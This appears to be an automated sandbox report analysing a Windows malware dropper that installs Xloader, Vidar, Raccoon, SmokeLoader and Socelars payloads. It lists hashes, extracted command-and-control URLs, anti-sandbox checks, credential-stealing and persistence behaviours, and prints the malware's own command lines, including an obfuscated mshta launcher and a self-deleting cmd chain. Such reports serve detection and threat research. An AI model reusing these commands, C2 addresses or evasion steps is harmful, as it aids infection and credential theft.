Analysis
-
max time kernel
122s
max time network
174s
platform
windows10_x64
resource
win10-en-20211014
submitted
31-10-2021 07:58
Static task
static1
Behavioral task
behavioral1
Sample
Sun038db98f99bf9a.exe
Resource
win7-en-20210920
General
-
Target
Sun038db98f99bf9a.exe
-
Size
172KB
-
MD5
7c3cf9ce3ffb1e5dd48896fdc9080bab
-
SHA1
34b4976f8f83c1e0a9d277d2a103a61616178728
-
SHA256
b3049882301853eed2aa8c5ac99010dd84292d7e092eb6f4311fa535716f5d83
-
SHA512
52ec2ec50a2d4ca4f29e6b611176e37fee8693a7c34ec2197ec2ad250d525f607c3d4d70534520d1f5c16fd3f9231d261b00f8c3746d033eab1ed36cdde07473
Malware Config
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
Extracted
vidar
41.6
937
https://mas.to/@lilocc
-
profile_id
937
Extracted
raccoon
8dec62c1db2959619dca43e02fa46ad7bd606400
-
url4cnc
Extracted
smokeloader
2020
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4236 | 1904 | rundll32.exe
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4860 | 1904 | rundll32.exe
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource | yara_rule
- C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe | family_socelars
- C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
description | pid | process | target process
- PID 2012 created 3860 | 2012 | WerFault.exe | Idgt2_xevoseMbjWCCJmG_Xz.tmp
- PID 3196 created 3168 | 3196 | WerFault.exe | GsszvROIc777BZI8uRb94auq.exe
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource | yara_rule
- behavioral2/memory/3960-162-0x0000000000780000-0x0000000000856000-memory.dmp | family_vidar
- behavioral2/memory/3960-158-0x0000000000400000-0x00000000004D9000-memory.dmp | family_vidar
Xloader Payload 3 IoCs
Processes:
resource | yara_rule
- C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe | xloader
- C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe | xloader
- behavioral2/memory/1296-152-0x0000000002A40000-0x0000000002A69000-memory.dmp | xloader
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
description | ioc | process
- File opened for modification | C:\Windows\system32\drivers\etc\hosts | ShareFolder.exe
- File opened for modification | C:\Windows\system32\drivers\etc\hosts | ShareFolder.exe
Executes dropped EXE 29 IoCs
Processes:
pid | process
- 1072 | HkYPWI9aKQ83BkX1tmb4PkBH.exe
- 584 | EokPGLmIU6f_A094eCm4ixtW.exe
- 3864 | peVZ_JD1pJ9rKZUC5V1uN9_H.exe
- 2528 | hFBgXG1kL15D1QH2z3IQpdj5.exe
- 3960 | 3e9n_iZAxCcrAw489a4i_YhF.exe
- 2456 | inU854R6rROYiSJmh8xYxToM.exe
- 3860 | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe
- 1916 | 348niyVABJJpEDLnX9LkeUO3.exe
- 436 | igymXiYoKu13gldo2cV24SID.exe
- 684 | cl49FjCLHtdGJS0qgRY_GIWk.exe
- 3168 | GsszvROIc777BZI8uRb94auq.exe
- 380 | iNlffGo5eLVRM6CPJEHz_UIe.exe
- 1784 | dsx8NSUe9OeszftG2KwTJZCm.exe
- 3704 | Idgt2_xevoseMbjWCCJmG_Xz.exe
- 3712 | 17t81FuvdBMrcTNzilmgcRH1.exe
- 2216 | 17t81FuvdBMrcTNzilmgcRH1.tmp
- 3860 | Idgt2_xevoseMbjWCCJmG_Xz.tmp
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 1816 | ShareFolder.exe
- 1880 | ShareFolder.exe
- 420 | kPBhgOaGQk.exe
- 1228 | setup.exe
- 1812 | foldershare.exe
- 1612 | foldershare.exe
- 392 | Qyjunukyfi.exe
- 3900 | Hedejaefygi.exe
- 1676 | Haewebujegi.exe
- 1780 | Vashaezhufeho.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | hFBgXG1kL15D1QH2z3IQpdj5.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | hFBgXG1kL15D1QH2z3IQpdj5.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
- Key value queried | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation | Sun038db98f99bf9a.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation | vy6NfB8MFQfwf7dqcTs4d7VI.exe
Loads dropped DLL 14 IoCs
Processes:
pid | process
- 3960 | 3e9n_iZAxCcrAw489a4i_YhF.exe
- 3960 | 3e9n_iZAxCcrAw489a4i_YhF.exe
- 2216 | 17t81FuvdBMrcTNzilmgcRH1.tmp
- 3860 | Idgt2_xevoseMbjWCCJmG_Xz.tmp
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 2300 | GzXwQLrWQrUilTPBbe4MHVGz.exe
- 1228 | setup.exe
- 1228 | setup.exe
- 2232 | msiexec.exe
- 2232 | msiexec.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
- C:\Users\Admin\Pictures\Adobe Films\hFBgXG1kL15D1QH2z3IQpdj5.exe | themida
- behavioral2/memory/2528-142-0x00000000011A0000-0x00000000011A1000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Tusheshudeshu.exe\"" | ShareFolder.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Tusheshudeshu.exe\"" | ShareFolder.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description | ioc | process
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | hFBgXG1kL15D1QH2z3IQpdj5.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
- 18 | ipinfo.io
- 19 | ipinfo.io
- 64 | ipinfo.io
- 65 | ipinfo.io
- 83 | ipinfo.io
- 134 | ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | process
- 2528 | hFBgXG1kL15D1QH2z3IQpdj5.exe
Suspicious use of SetThreadContext 2 IoCs
Processes:
description | pid | process | target process
- PID 3864 set thread context of 3008 | 3864 | peVZ_JD1pJ9rKZUC5V1uN9_H.exe | Explorer.EXE
- PID 1296 set thread context of 3008 | 1296 | colorcpl.exe | Explorer.EXE
Drops file in Program Files directory 10 IoCs
Processes:
description | ioc | process
- File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | EokPGLmIU6f_A094eCm4ixtW.exe
- File created | C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe.config | ShareFolder.exe
- File created | C:\Program Files (x86)\Windows Portable Devices\Tusheshudeshu.exe | ShareFolder.exe
- File created | C:\Program Files (x86)\Windows Portable Devices\Tusheshudeshu.exe.config | ShareFolder.exe
- File created | C:\Program Files (x86)\Internet Explorer\Tusheshudeshu.exe.config | ShareFolder.exe
- File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | EokPGLmIU6f_A094eCm4ixtW.exe
- File created | C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe | ShareFolder.exe
- File created | C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe | ShareFolder.exe
- File created | C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe.config | ShareFolder.exe
- File created | C:\Program Files (x86)\Internet Explorer\Tusheshudeshu.exe | ShareFolder.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
Processes:
pid | pid_target | process | target process
- 1304 | 3860 | WerFault.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 3760 | 3860 | WerFault.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 832 | 3860 | WerFault.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 1708 | 3860 | WerFault.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 2040 | 3860 | WerFault.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 2012 | 3860 | WerFault.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe
- 2012 | 3168 | WerFault.exe | GsszvROIc777BZI8uRb94auq.exe
- 500 | 3168 | WerFault.exe | GsszvROIc777BZI8uRb94auq.exe
- 1080 | 3168 | WerFault.exe | GsszvROIc777BZI8uRb94auq.exe
- 2040 | 3168 | WerFault.exe | GsszvROIc777BZI8uRb94auq.exe
- 3196 | 3168 | WerFault.exe | GsszvROIc777BZI8uRb94auq.exe
- 6528 | 2456 | WerFault.exe | inU854R6rROYiSJmh8xYxToM.exe
NSIS installer 4 IoCs
Processes:
resource | yara_rule
- C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe | nsis_installer_1
- C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe | nsis_installer_2
- C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe | nsis_installer_1
- C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe | nsis_installer_2
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cl49FjCLHtdGJS0qgRY_GIWk.exe
- Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cl49FjCLHtdGJS0qgRY_GIWk.exe
- Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cl49FjCLHtdGJS0qgRY_GIWk.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 3e9n_iZAxCcrAw489a4i_YhF.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 3e9n_iZAxCcrAw489a4i_YhF.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
- 1676 | schtasks.exe
- 3824 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
- 2016 | timeout.exe
Kills process with taskkill 4 IoCs
Processes:
pid | process
- 3312 | taskkill.exe
- 3716 | taskkill.exe
- 924 | taskkill.exe
- 4456 | taskkill.exe
Processes:
description | ioc | process
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value omitted] | igymXiYoKu13gldo2cV24SID.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | igymXiYoKu13gldo2cV24SID.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
- 3608 | Sun038db98f99bf9a.exe
- 3608 | Sun038db98f99bf9a.exe
- 1072 | HkYPWI9aKQ83BkX1tmb4PkBH.exe (this same row is repeated for every remaining entry in the table)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
- 3008 | Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
pid | process
- 3864 | peVZ_JD1pJ9rKZUC5V1uN9_H.exe
- 3864 | peVZ_JD1pJ9rKZUC5V1uN9_H.exe
- 3864 | peVZ_JD1pJ9rKZUC5V1uN9_H.exe
- 1296 | colorcpl.exe
- 1296 | colorcpl.exe
- 684 | cl49FjCLHtdGJS0qgRY_GIWk.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
- Token: SeDebugPrivilege | 3864 | peVZ_JD1pJ9rKZUC5V1uN9_H.exe
- Token: SeDebugPrivilege | 1296 | colorcpl.exe
- Token: SeRestorePrivilege | 1304 | WerFault.exe
- Token: SeBackupPrivilege | 1304 | WerFault.exe
- Token: SeDebugPrivilege | 1304 | WerFault.exe
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeDebugPrivilege | 3760 | WerFault.exe
- Token: SeDebugPrivilege | 832 | WerFault.exe
- Token: SeDebugPrivilege | 1708 | WerFault.exe
- Token: SeDebugPrivilege | 2040 | WerFault.exe
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeCreateTokenPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeAssignPrimaryTokenPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeLockMemoryPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeIncreaseQuotaPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeMachineAccountPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeTcbPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeSecurityPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeTakeOwnershipPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeLoadDriverPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeSystemProfilePrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeSystemtimePrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeProfSingleProcessPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeIncBasePriorityPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeCreatePagefilePrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeCreatePermanentPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeBackupPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeRestorePrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeShutdownPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeDebugPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeAuditPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeSystemEnvironmentPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeChangeNotifyPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeRemoteShutdownPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeUndockPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeSyncAgentPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeEnableDelegationPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeManageVolumePrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeImpersonatePrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeCreateGlobalPrivilege | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: 31 | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: 32 | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: 33 | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: 34 | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: 35 | 436 | igymXiYoKu13gldo2cV24SID.exe
- Token: SeDebugPrivilege | 2528 | hFBgXG1kL15D1QH2z3IQpdj5.exe
- Token: SeDebugPrivilege | 3312 | taskkill.exe
- Token: SeDebugPrivilege | 2012 | WerFault.exe
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeShutdownPrivilege | 3008 | Explorer.EXE
- Token: SeCreatePagefilePrivilege | 3008 | Explorer.EXE
- Token: SeDebugPrivilege | 500 | WerFault.exe
- Token: SeDebugPrivilege | 1080 | WerFault.exe
- Token: SeDebugPrivilege | 2040 | WerFault.exe
- Token: SeDebugPrivilege | 3716 | taskkill.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (identical consecutive rows are collapsed, with the entry count in parentheses)
- PID 3608 wrote to memory of 1072 | 3608 | Sun038db98f99bf9a.exe | HkYPWI9aKQ83BkX1tmb4PkBH.exe (2 entries)
- PID 3608 wrote to memory of 584 | 3608 | Sun038db98f99bf9a.exe | EokPGLmIU6f_A094eCm4ixtW.exe (3 entries)
- PID 3608 wrote to memory of 3864 | 3608 | Sun038db98f99bf9a.exe | peVZ_JD1pJ9rKZUC5V1uN9_H.exe (3 entries)
- PID 3608 wrote to memory of 3960 | 3608 | Sun038db98f99bf9a.exe | 3e9n_iZAxCcrAw489a4i_YhF.exe (3 entries)
- PID 3608 wrote to memory of 2528 | 3608 | Sun038db98f99bf9a.exe | hFBgXG1kL15D1QH2z3IQpdj5.exe (3 entries)
- PID 3608 wrote to memory of 2456 | 3608 | Sun038db98f99bf9a.exe | inU854R6rROYiSJmh8xYxToM.exe (3 entries)
- PID 3608 wrote to memory of 3860 | 3608 | Sun038db98f99bf9a.exe | jrRTQ4OfEZSYNWyLy6P_8o7p.exe (3 entries)
- PID 3008 wrote to memory of 1296 | 3008 | Explorer.EXE | colorcpl.exe (3 entries)
- PID 1296 wrote to memory of 1168 | 1296 | colorcpl.exe | cmd.exe (3 entries)
- PID 584 wrote to memory of 1436 | 584 | EokPGLmIU6f_A094eCm4ixtW.exe | vy6NfB8MFQfwf7dqcTs4d7VI.exe (3 entries)
- PID 584 wrote to memory of 1676 | 584 | EokPGLmIU6f_A094eCm4ixtW.exe | schtasks.exe (3 entries)
- PID 584 wrote to memory of 3824 | 584 | EokPGLmIU6f_A094eCm4ixtW.exe | schtasks.exe (3 entries)
- PID 1436 wrote to memory of 1916 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | 348niyVABJJpEDLnX9LkeUO3.exe (2 entries)
- PID 1436 wrote to memory of 3168 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | GsszvROIc777BZI8uRb94auq.exe (3 entries)
- PID 1436 wrote to memory of 436 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | igymXiYoKu13gldo2cV24SID.exe (3 entries)
- PID 1436 wrote to memory of 684 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | cl49FjCLHtdGJS0qgRY_GIWk.exe (3 entries)
- PID 1436 wrote to memory of 380 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | iNlffGo5eLVRM6CPJEHz_UIe.exe (2 entries)
- PID 3960 wrote to memory of 1696 | 3960 | 3e9n_iZAxCcrAw489a4i_YhF.exe | cmd.exe (3 entries)
- PID 1436 wrote to memory of 1784 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | dsx8NSUe9OeszftG2KwTJZCm.exe (3 entries)
- PID 1696 wrote to memory of 3312 | 1696 | cmd.exe | taskkill.exe (3 entries)
- PID 1784 wrote to memory of 1644 | 1784 | dsx8NSUe9OeszftG2KwTJZCm.exe | mshta.exe (3 entries)
- PID 1436 wrote to memory of 3704 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | Idgt2_xevoseMbjWCCJmG_Xz.exe (3 entries)
- PID 1436 wrote to memory of 3712 | 1436 | vy6NfB8MFQfwf7dqcTs4d7VI.exe | 17t81FuvdBMrcTNzilmgcRH1.exe (1 entry)
Processes
-
Process (depth 1): C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Process (depth 2): C:\Users\Admin\AppData\Local\Temp\Sun038db98f99bf9a.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Sun038db98f99bf9a.exe"
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
Process (depth 3): C:\Users\Admin\Pictures\Adobe Films\HkYPWI9aKQ83BkX1tmb4PkBH.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\HkYPWI9aKQ83BkX1tmb4PkBH.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
Process (depth 3): C:\Users\Admin\Pictures\Adobe Films\hFBgXG1kL15D1QH2z3IQpdj5.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\hFBgXG1kL15D1QH2z3IQpdj5.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 3): C:\Users\Admin\Pictures\Adobe Films\3e9n_iZAxCcrAw489a4i_YhF.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\3e9n_iZAxCcrAw489a4i_YhF.exe"
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
Process (depth 4): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im 3e9n_iZAxCcrAw489a4i_YhF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\3e9n_iZAxCcrAw489a4i_YhF.exe" & del C:\ProgramData\*.dll & exit
- Suspicious use of WriteProcessMemory
-
Process (depth 5): C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /im 3e9n_iZAxCcrAw489a4i_YhF.exe /f
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 5): C:\Windows\SysWOW64\timeout.exe
Command line: timeout /t 6
- Delays execution with timeout.exe
-
Process (depth 3): C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 3): C:\Users\Admin\Pictures\Adobe Films\EokPGLmIU6f_A094eCm4ixtW.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\EokPGLmIU6f_A094eCm4ixtW.exe"
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
Process (depth 4): C:\Users\Admin\Documents\vy6NfB8MFQfwf7dqcTs4d7VI.exe
Command line: "C:\Users\Admin\Documents\vy6NfB8MFQfwf7dqcTs4d7VI.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Process (depth 5): C:\Users\Admin\Pictures\Adobe Films\348niyVABJJpEDLnX9LkeUO3.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\348niyVABJJpEDLnX9LkeUO3.exe"
- Executes dropped EXE
-
Process (depth 5): C:\Users\Admin\Pictures\Adobe Films\GsszvROIc777BZI8uRb94auq.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\GsszvROIc777BZI8uRb94auq.exe"
- Executes dropped EXE
-
Process (depth 6): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 660
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 6): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 696
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 6): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 772
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 6): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 808
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 6): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1088
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
Process (depth 5): C:\Users\Admin\Pictures\Adobe Films\iNlffGo5eLVRM6CPJEHz_UIe.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\iNlffGo5eLVRM6CPJEHz_UIe.exe"
- Executes dropped EXE
-
Process (depth 5): C:\Users\Admin\Pictures\Adobe Films\cl49FjCLHtdGJS0qgRY_GIWk.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\cl49FjCLHtdGJS0qgRY_GIWk.exe"
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
Process (depth 5): C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe"
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 6): C:\Windows\SysWOW64\cmd.exe
Command line: cmd.exe /c taskkill /f /im chrome.exe
-
Process (depth 7): C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /f /im chrome.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 5): C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe
Command line: "C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
Process (depth 6): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
-
Process (depth 7): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe" ) do taskkill -f -iM "%~NxM"
-
Process (depth 8): C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
Command line: ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
- Executes dropped EXE
-
